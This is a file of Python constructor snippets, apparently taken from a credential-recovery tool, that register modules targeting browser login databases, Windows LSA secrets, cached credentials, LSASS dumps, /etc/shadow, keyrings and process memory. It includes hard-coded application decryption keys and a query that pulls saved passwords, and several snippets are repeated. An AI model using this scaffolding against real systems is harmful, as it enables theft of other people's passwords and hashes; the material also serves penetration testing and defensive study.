def __init__(self):
    """Register the KDE wallet module and the D-Bus endpoints it will query.

    ``bus_info`` lists (service name, object path) pairs for both the legacy
    kwalletd and the kwalletd5 daemon; the consumer of this list lives
    elsewhere in the class. Attributes are set before the base-class call,
    matching the original order in case ModuleInfo reads them.
    """
    self.appid = 'Get KDE keyring'
    self.bus_info = [
        ('org.kde.kwalletd', '/modules/kwalletd'),
        ('org.kde.kwalletd5', '/modules/kwalletd5'),
    ]
    ModuleInfo.__init__(self, name='kwallet', category='wallet')
def __init__(self):
    """Register the 'hashdump' module (category 'system') and reset its state.

    The user name, KDF iteration count, and hex-encoded salt/entropy are all
    initialised to ``None``; they are filled in by other methods of the class.
    """
    ModuleInfo.__init__(self, name='hashdump', category='system')
    self.username = None
    self.iterations = None
    self.salt_hex = None
    self.entropy_hex = None
def __init__(self, safe_storage_key=None):
    """Register the Chrome (macOS) module and locate its credential databases.

    Globs every user's ``Login Data`` and ``Web Data`` SQLite files under the
    Chrome profile directories; the resulting paths are stored in
    ``chrome_data`` (login databases first, then web-data databases).
    ``safe_storage_key`` is the optional key used elsewhere to decrypt the
    stored values; it is kept as given (possibly ``None``).
    """
    ModuleInfo.__init__(self, name='chrome', category='browsers')
    patterns = (
        '/Users/*/Library/Application Support/Google/Chrome/*/Login Data',
        '/Users/*/Library/Application Support/Google/Chrome/*/Web Data',
    )
    found = []
    for pattern in patterns:
        found.extend(glob.glob(pattern))
    self.chrome_data = found
    self.safe_storage_key = safe_storage_key
def __init__(self):
    """Register the Robomongo / Robo 3T module and list its config locations.

    Each entry in ``paths`` is a dict with a ``directory`` (relative to a
    home directory, presumably resolved by the caller) and the JSON
    ``filename`` inside it.
    """
    ModuleInfo.__init__(self, name='robomongo', category='databases')
    self.paths = [
        {'directory': u'.config/robomongo', 'filename': u'robomongo.json'},
        {'directory': u'.3T/robo-3t/1.1.1', 'filename': u'robo3t.json'},
    ]
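def __init__(self):
    """Register the in-memory credential scanner and compile its search rules.

    Each rule in ``rules`` carries a ``process`` regex (presumably matched
    against a process name/path), a ``near`` regex (a marker string, presumably
    expected close to the secret in memory), and the handler ``func`` used to
    validate a candidate. Both regexes are compiled once here so that the
    matching code, which lives elsewhere in the class, never re-parses
    pattern strings. ``look_after_size`` / ``look_before_size`` are the byte
    windows examined around a hit.
    """
    ModuleInfo.__init__(self, 'mimipy', 'memory')
    self.shadow_hashes = []
    self.rules = [
        {
            "desc": "[SYSTEM - GNOME]",
            "process": r"gnome-keyring-daemon|gdm-password|gdm-session-worker",
            "near": r"libgcrypt\.so\..+|libgck\-1\.so\.0|_pammodutil_getpwnam_|gkr_system_authtok",
            "func": self.test_shadow,
        },
        {
            "desc": "[SYSTEM - LightDM]",
            # Ubuntu/xubuntu login screen :) https://doc.ubuntu-fr.org/lightdm
            "process": r"lightdm",
            "near": r"_pammodutil_getpwnam_|gkr_system_authtok",
            "func": self.test_shadow,
        },
        {
            "desc": "[SYSTEM - SSH Server]",
            "process": r"/sshd$",
            "near": r"sudo.+|_pammodutil_getpwnam_",
            "func": self.test_shadow,
        },
        {
            "desc": "[SSH Client]",
            "process": r"/ssh$",
            "near": r"sudo.+|/tmp/ICE-unix/[0-9]+",
            "func": self.test_shadow,
        },
        {
            "desc": "[SYSTEM - VSFTPD]",
            "process": r"vsftpd",
            "near": r"^::.+\:[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}$",
            "func": self.test_shadow,
        },
    ]
    # Precompile regexes to optimize speed. isinstance() (rather than an exact
    # type() comparison) is used so that any already-compiled pattern object,
    # including subclasses, is recognised and not re-compiled.
    pattern_type = type(re.compile("^plop$"))
    for rule in self.rules:
        for key in ("near", "process"):
            if key in rule and not isinstance(rule[key], pattern_type):
                rule[key] = re.compile(rule[key])
    self.look_after_size = 1000 * 10 ** 3
    self.look_before_size = 500 * 10 ** 3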
def __init__(self):
    """Register the LSA secrets module under the 'windows' category.

    ``system_module=True`` marks it as requiring system-level privileges
    (the flag is interpreted by ModuleInfo, not here).
    """
    ModuleInfo.__init__(
        self, name='lsa_secrets', category='windows', system_module=True
    )
def __init__(self):
    """Register the CoreFTP module and store its fixed decryption secret.

    ``_secret`` is a hard-coded constant; presumably the application's own
    static key used by the decrypt routine elsewhere in the class — it is not
    a secret of this code base.
    """
    ModuleInfo.__init__(self, name='coreftp', category='sysadmin')
    self._secret = "hdfzpysvpzimorhk"
def __init__(self):
    """Register the MS cached-credentials module (category 'windows').

    Flagged as a system module; the flag is consumed by ModuleInfo.
    """
    ModuleInfo.__init__(
        self, name='mscache', category='windows', system_module=True
    )
def __init__(self):
    """Register the Apache Directory Studio module.

    ``attr_to_extract`` names the XML attributes of an ADS connection entry
    that are worth collecting (host, port, bind principal/password, auth
    method); the XML parsing happens elsewhere in the class.
    """
    ModuleInfo.__init__(self, name='apachedirectorystudio', category='sysadmin')
    # Interesting XML attributes in ADS connection configuration
    self.attr_to_extract = [
        "host",
        "port",
        "bindPrincipal",
        "bindPassword",
        "authMethod",
    ]
def __init__(self):
    """Register the KeePass module under the 'memory' category."""
    ModuleInfo.__init__(self, name='keepass', category='memory')
def __init__(self):
    """Register the Claws Mail module under the 'mails' category."""
    ModuleInfo.__init__(self, name='clawsmail', category='mails')
def __init__(self):
    """Register the SQL Developer module and seed its key-derivation inputs.

    The salt comes from ``get_salt()`` (defined elsewhere in the class); the
    passphrase starts as ``None`` and the iteration count is the fixed value
    42. These are presumably the parameters of the application's own
    password-obfuscation scheme — confirm against the decrypt routine.
    """
    ModuleInfo.__init__(self, name='sqldeveloper', category='databases')
    self._salt = self.get_salt()
    self._passphrase = None
    self._iteration = 42
def __init__(self):
    """Register the Windows credential-files module.

    ``dpapi_used=True`` tells ModuleInfo that DPAPI decryption is needed.
    """
    ModuleInfo.__init__(
        self, name='credfiles', category='windows', dpapi_used=True
    )
def __init__(self):
    """Register the Git-for-Windows module under the 'git' category."""
    ModuleInfo.__init__(self, name='gitforwindows', category='git')
def __init__(self, browser_name, paths):
    """Register a Chromium-based browser module that uses DPAPI.

    ``paths`` may be a single path or a list; it is normalised to a list.
    ``database_query`` is the SELECT run against the ``logins`` table of
    the browser's Login Data database by code elsewhere in the class.
    """
    if isinstance(paths, list):
        self.paths = paths
    else:
        self.paths = [paths]
    self.database_query = 'SELECT action_url, username_value, password_value FROM logins'
    ModuleInfo.__init__(
        self, name=browser_name, category='browsers', dpapi_used=True
    )
def __init__(self, browser_name, path):
    """Register a browser module for ``browser_name``.

    ``path`` has ``~`` / ``~user`` expanded before being stored so that
    later file access does not depend on the shell.
    """
    expanded = os.path.expanduser(path)
    self.path = expanded
    ModuleInfo.__init__(self, browser_name, category='browsers')
def __init__(self):
    """Register the Psi IM module (category 'chats').

    ``pwd_found`` is the accumulator for recovered entries and is created
    before the base-class call, as in the original.
    """
    self.pwd_found = []
    ModuleInfo.__init__(self, name='psi-im', category='chats')
def __init__(self):
    """Register the PostgreSQL module under the 'databases' category."""
    ModuleInfo.__init__(self, 'postgresql', 'databases')
def __init__(self):
    """Register the PostgreSQL module under the 'databases' category."""
    ModuleInfo.__init__(self, 'postgresql', 'databases')
def __init__(self):
    """Register the Windows 'hashdump' module; flagged as a system module."""
    ModuleInfo.__init__(
        self, name='hashdump', category='windows', system_module=True
    )
def __init__(self):
    """Register the unattended-install module (category 'sysadmin').

    Flagged as a system module; the flag is interpreted by ModuleInfo.
    """
    ModuleInfo.__init__(
        self, name='unattended', category='sysadmin', system_module=True
    )
def __init__(self):
    """Register the CoreFTP module and store its fixed decryption secret.

    ``_secret`` is a hard-coded constant; presumably the application's own
    static key consumed by the decrypt routine elsewhere in the class.
    """
    ModuleInfo.__init__(self, name='coreftp', category='sysadmin')
    self._secret = "hdfzpysvpzimorhk"
def __init__(self):
    """Register the Maven repositories module.

    ``nodes_to_extract`` lists the child element names of a ``<server>``
    entry in a Maven ``settings.xml`` that carry credentials (id, username,
    password, private key, passphrase); ``settings_namespace`` is the XML
    namespace prefix those elements live in.
    """
    ModuleInfo.__init__(self, name='mavenrepositories', category='maven')
    # Interesting XML nodes in Maven repository configuration
    self.nodes_to_extract = [
        "id",
        "username",
        "password",
        "privateKey",
        "passphrase",
    ]
    self.settings_namespace = "{http://maven.apache.org/SETTINGS/1.0.0}"
def __init__(self):
    """Register the pypykatz (LSASS dump) module; flagged as a system module."""
    ModuleInfo.__init__(
        self, name='pypykatz', category='windows', system_module=True
    )
def __init__(self):
    """Register the 'cli' module under the 'sysadmin' category."""
    ModuleInfo.__init__(self, name='cli', category='sysadmin')
def __init__(self):
    """Register the Pidgin module under the 'chats' category."""
    ModuleInfo.__init__(self, name='pidgin', category='chats')
def __init__(self):
    """Register the SQuirreL SQL module under the 'databases' category."""
    ModuleInfo.__init__(self, 'squirrel', 'databases')
def __init__(self):
    """Register the WinSCP module (reads the registry) and reset ``hash``.

    ``hash`` starts empty and is presumably populated by the decoding code
    elsewhere in the class.
    """
    ModuleInfo.__init__(
        self, name='winscp', category='sysadmin', registry_used=True
    )
    self.hash = ''
def __init__(self):
    """Register the Pidgin module under the 'chats' category."""
    ModuleInfo.__init__(self, name='pidgin', category='chats')
def __init__(self):
    """Register the /etc/shadow module under the 'sysadmin' category."""
    ModuleInfo.__init__(self, name='shadow', category='sysadmin')
def __init__(self, browser_name, path):
    """Register a browser module named ``browser_name`` rooted at ``path``.

    The path is stored verbatim (no expansion or validation here).
    """
    self.path = path
    ModuleInfo.__init__(self, name=browser_name, category='browsers')
def __init__(self):
    """Register the DbVisualizer module and seed its key-derivation inputs.

    The salt comes from ``get_salt()`` (defined elsewhere in the class); the
    passphrase 'qinda' and iteration count 10 are fixed constants, presumably
    the application's own password-obfuscation parameters — confirm against
    the decrypt routine.
    """
    ModuleInfo.__init__(self, 'dbvis', 'databases')
    self._salt = self.get_salt()
    self._passphrase = 'qinda'
    self._iteration = 10
def __init__(self):
    """Register the Wi-Fi credentials module under the 'wifi' category."""
    ModuleInfo.__init__(self, name='wifi', category='wifi')
def __init__(self):
    """Register the Windows autologon module.

    Reads the registry and is flagged as a system module; both flags are
    interpreted by ModuleInfo.
    """
    ModuleInfo.__init__(
        self,
        name='autologon',
        category='windows',
        registry_used=True,
        system_module=True,
    )
def __init__(self):
    """Register the FileZilla module under the 'sysadmin' category."""
    ModuleInfo.__init__(self, name='filezilla', category='sysadmin')
def __init__(self):
    """Register the Remote Desktop Manager module (DPAPI-backed)."""
    ModuleInfo.__init__(
        self, name='rdpmanager', category='sysadmin', dpapi_used=True
    )
def __init__(self, browser_name, path):
    """Register a browser module named ``browser_name`` rooted at ``path``.

    The path is stored verbatim (no expansion or validation here).
    """
    self.path = path
    ModuleInfo.__init__(self, name=browser_name, category='browsers')
def __init__(self):
    """Register the generic 'windows' module under the 'windows' category."""
    ModuleInfo.__init__(self, name='windows', category='windows')
def __init__(self):
    """Register the MS cached-credentials module; flagged as a system module."""
    ModuleInfo.__init__(
        self, name='mscache', category='windows', system_module=True
    )
def __init__(self):
    """Register the Git-for-Linux module under the 'git' category."""
    ModuleInfo.__init__(self, name='gitforlinux', category='git')
def __init__(self):
    """Register the OpenSSH-for-Windows module under 'sysadmin'."""
    ModuleInfo.__init__(self, name='opensshforwindows', category='sysadmin')
def __init__(self):
    """Register the Windows Vault module.

    ``only_from_current_user=True`` restricts it to the running user's
    context; the flag is interpreted by ModuleInfo.
    """
    ModuleInfo.__init__(
        self, name='vault', category='windows', only_from_current_user=True
    )
def __init__(self):
    """Register the /etc/fstab module under the 'sysadmin' category."""
    ModuleInfo.__init__(self, name='fstab', category='sysadmin')
def __init__(self):
    """Register the PuTTY Connection Manager module (reads the registry)."""
    ModuleInfo.__init__(
        self, name='puttycm', category='sysadmin', registry_used=True
    )
def __init__(self):
    """Register the Remote Desktop Manager module (uses the Windows API)."""
    ModuleInfo.__init__(
        self, name='rdpmanager', category='sysadmin', winapi_used=True
    )
def __init__(self):
    """Register the Opera module under the 'browsers' category."""
    ModuleInfo.__init__(self, name='opera', category='browsers')
def __init__(self):
    """Register the LSA secrets module; flagged as a system module."""
    ModuleInfo.__init__(
        self, name='lsa_secrets', category='windows', system_module=True
    )
def __init__(self):
    """Register the Rogue's Tale module under the 'games' category."""
    ModuleInfo.__init__(self, name='roguestale', category='games')
def __init__(self, browser_name, paths):
    """Register a Chromium-based browser module that uses the Windows API.

    ``paths`` may be a single path or a list; it is normalised to a list.
    ``database_query`` is the SELECT run against the ``logins`` table of
    the browser's Login Data database by code elsewhere in the class.
    """
    if isinstance(paths, list):
        self.paths = paths
    else:
        self.paths = [paths]
    self.database_query = 'SELECT action_url, username_value, password_value FROM logins'
    ModuleInfo.__init__(
        self, name=browser_name, category='browsers', winapi_used=True
    )
def __init__(self):
    """Register the 'system' module under the 'system' category."""
    ModuleInfo.__init__(self, name='system', category='system')
def __init__(self):
    """Register the TortoiseSVN module (uses the Windows API)."""
    ModuleInfo.__init__(
        self, name='tortoise', category='svn', winapi_used=True
    )
def __init__(self):
    """Register the OpenSSH-for-Windows module and locate the key directory.

    ``key_files_location`` is ``<USERPROFILE>\\.ssh``, built from the
    ``constant.profile`` mapping; a missing ``USERPROFILE`` entry raises
    KeyError here, at construction time.
    """
    ModuleInfo.__init__(self, name='opensshforwindows', category='sysadmin')
    profile_dir = constant.profile["USERPROFILE"]
    self.key_files_location = os.path.join(profile_dir, u'.ssh')
def __init__(self):
    """Register the VNC module and store the fixed 8-byte key.

    ``vnckey`` is a hard-coded constant, presumably the static key VNC
    products use to obfuscate stored passwords — it is not a secret of this
    code base. It is set before the base-class call, as in the original.
    """
    self.vnckey = [23, 82, 107, 6, 35, 78, 88, 7]
    ModuleInfo.__init__(self, 'vnc', 'sysadmin')
def __init__(self):
    """Register the GRUB module under the 'sysadmin' category."""
    ModuleInfo.__init__(self, name='grub', category='sysadmin')
def __init__(self):
    """Register the Apache Directory Studio module.

    ``attr_to_extract`` names the XML attributes of an ADS connection entry
    that are worth collecting; the parsing happens elsewhere in the class.
    """
    ModuleInfo.__init__(self, name='apachedirectorystudio', category='sysadmin')
    # Interesting XML attributes in ADS connection configuration
    self.attr_to_extract = [
        "host",
        "port",
        "bindPrincipal",
        "bindPassword",
        "authMethod",
    ]
def __init__(self):
    """Register the FileZilla module under the 'sysadmin' category."""
    ModuleInfo.__init__(self, name='filezilla', category='sysadmin')
def __init__(self):
    """Register the /etc/shadow module under the 'sysadmin' category."""
    ModuleInfo.__init__(self, name='shadow', category='sysadmin')
def __init__(self):
    """Register the Opera module under the 'browsers' category."""
    ModuleInfo.__init__(self, name='opera', category='browsers')
def __init__(self):
    """Register the Kalypso Media module under the 'games' category."""
    ModuleInfo.__init__(self, name='kalypsomedia', category='games')
def __init__(self):
    """Register the Galcon Fusion module (reads the registry)."""
    ModuleInfo.__init__(
        self, name='galconfusion', category='games', registry_used=True
    )